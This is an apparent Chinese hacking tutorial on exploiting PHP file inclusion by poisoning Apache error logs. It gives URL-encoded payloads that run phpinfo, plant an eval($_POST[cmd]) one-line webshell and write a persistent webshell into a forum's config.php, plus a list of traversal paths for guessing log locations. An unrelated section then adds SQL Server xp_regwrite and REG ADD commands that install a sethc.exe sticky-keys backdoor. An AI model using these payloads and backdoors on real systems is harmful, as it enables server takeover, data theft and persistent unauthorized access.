关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行,当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。
比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句
你可以
xxx.com/z.php?zizzy=/etc/inetd.conf
xxx.com/z.php?zizzy=/proc/cpuinfo
xxx.com/z.php?zizzy=/etc/passwd
就可以利用包含语句来查看一些系统环境和密码档文件。
那么关于日志包含下面我们来看:
比如我们的Apache的服务器配置文件位置在这里
/usr/local/apache/conf/httpd.conf
那么我们来包含一下httpd.conf,来看下路径信息什么的
xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf
读出Apache的配置信息,这里列出部分信息。
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
而我们提交xxx.com/z.php?zizzy=/home ... /logs/www-error_log
就可以读出Apache的错误日志记录
[Mon Jan 22 14:01:16 ] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script. /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script. /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script. /home/virtual/www.xxx.com/kkkkkkkk
而数据日志/home/virtual/www.xxx.com/logs/www-access_log也是一样的,一样可以读出来,只不过文件会很大,那也没意思测试下去了,那怎么利用呢。
比如我们提交要提交这句,
在这里,我们只能提交URL编码模式,因为我在测试中发现,
在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的
www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E
这样肯定会报出错找不到页面,而一出错就被记在错误日志里了
xxx.com/z.php?zizzy=/home ... /logs/www-error_log
这样这个日志文件就被包含成了phpinfo的信息,而回显也就成了一个显示php信息的页面。
如果可以的话(能够执行系统命令,也就是safe_mode开着的时候),
这样子也不错,
/home/
total 9
-rw-r--r-- 1 www.xxx.com silver 55 Jan 20 23:01 about.php
drwxrwxrwx 4 www.xxx.com silver 4096 Jan 21 06:07 abc
-rw-r--r-- 1 www.xxx.com silver 1438 Dec 3 07:39 index.php
-rwxrwxrwx 1 www.xxx.com silver 5709 Jan 21 20:05 show.php
-rw-r--r-- 1 www.xxx.com silver 5936 Jan 18 01:37 admin.php
-rwxrwxrwx 1 www.xxx.com silver 5183 Jan 18 15:30 config.php3
-rw-rw-rw- 1 www.xxx.com silver 102229 Jan 21 23:18 info.txt
drwxr-xr-x 2 www.xxx.com silver 4096 Jan 8 16:03 backup
-rw-r--r-- 1 www.xxx.com silver 7024 Dec 4 03:07 test.php
这样就列出了home下的文件
或者直接一句话木马
这样转换后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 这样的格式。
我们提交
www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E
再用lanker的一句话木马客户端一连就OK了。
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
比如还是这句一句话木马
到这里你也许就想到了,这是个很不错的办法,
接着看,如何写入就成了个问题,用这句,
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入
fclose($fp);?>//在config.php里写入一句木马语句
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
转换为
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我们提交
xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
这样就错误日志里就记录下了这行写入webshell的代码。
我们再来包含日志,提交
xxx.com/z.php?zizzy=/home ... /logs/www-error_log
这样webshell就写入成功了,config.php里就写入一句木马语句
OK.
www.xxx.com/forum/config.php这个就成了我们的webshell
直接用lanker的客户端一连,主机就是你的了。
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
其他的日志路径,你可以去猜,也可以参照这里。
附:收集的一些日志路径
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
渗透的时候拿到了权限,如何通过SQL语句进行渗透提权,本文主要介绍了一些方法,目标:
1、能修改注册表
2、能访问3389
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','';--
REG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v debugger /t REG_sz /d “c:\windows\system32\cmd.exe” on /f
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethcasd.exe]
“debugger”=“c:\\windows\\system32\\cmd.exe on”
regedit
/s 导入 .reg 文件进注册表(安静模式)
/e 导出注册表文件
例:regedit /e filename.reg HKEY_LOCAL_MACHINE//SYSTEM
magnify.exe
osk.exe
sethc.exe
★ 商业网站策划书
★ 安全分析会议纪要
